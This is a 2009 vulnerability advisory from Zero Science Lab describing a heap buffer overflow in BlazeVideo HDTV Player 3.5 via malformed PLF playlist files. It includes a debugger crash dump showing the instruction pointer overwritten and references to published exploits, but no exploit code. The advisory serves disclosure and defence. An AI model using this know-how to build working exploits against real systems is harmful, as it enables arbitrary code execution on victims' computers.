BlazeVideo HDTV Player <= 3.5 PLF Playlist File Remote Buffer Overflow Exploit

Title: BlazeVideo HDTV Player <= 3.5 PLF Playlist File Remote Buffer Overflow Exploit
Advisory ID: ZSL-2009-4906
Type: Local/Remote
Impact: System Access
Risk: (3/5)
Release Date: 04.02.2009
Summary
BlazeVideo HDTV Player (BlazeDTV) is a full-featured and easy-to-use HDTV Player software, combining HDTV playback, FM receiving, video record and DVD playback functions. You can make advantage of PC monitor's high resolution, watch, record, playback high definition HDTV program or teletext broadcast program.
Description
BlazeVideo HDTV Player is prone to a heap-based buffer-overflow vulnerability because the application fails to handle malformed playlist files. An attacker can exploit this issue to execute arbitrary code within the context of the application or to trigger a denial-of-service condition.

--------------------------------------------------------------------------------

(620.d74): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=77f6c15c ecx=04eb0dc0 edx=00000042 esi=0266ffc0 edi=00000001
eip=43434343 esp=0013f288 ebp=6405247c iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216
43434343 ?? ???

--------------------------------------------------------------------------------

Vendor
BlazeVideo, Inc. - http://www.blazevideo.com
Affected Version
3.5
Tested On
Microsoft Windows XP Professional SP2 (English)
Vendor Status
N/A
PoC
blazehdtv_hof.py
Credits
Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>
References
[1] http://www.securityfocus.com/bid/33588
[2] http://www.packetstormsecurity.org/filedesc/blazehdtv-hof.txt.html
[3] http://www.milw0rm.com/exploits/7975
[4] http://www.hackzone.ru/exploit/view/id/4597/
[5] http://www.exploit-db.com/exploits/7975/
[6] http://osvdb.org/show/osvdb/51825
[7] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0450
Changelog
[04.02.2009] - Initial release
[19.07.2012] - Added reference [5], [6] and [7]
Contact
Zero Science Lab

Web: http://www.zeroscience.mk
e-mail: lab@zeroscience.mk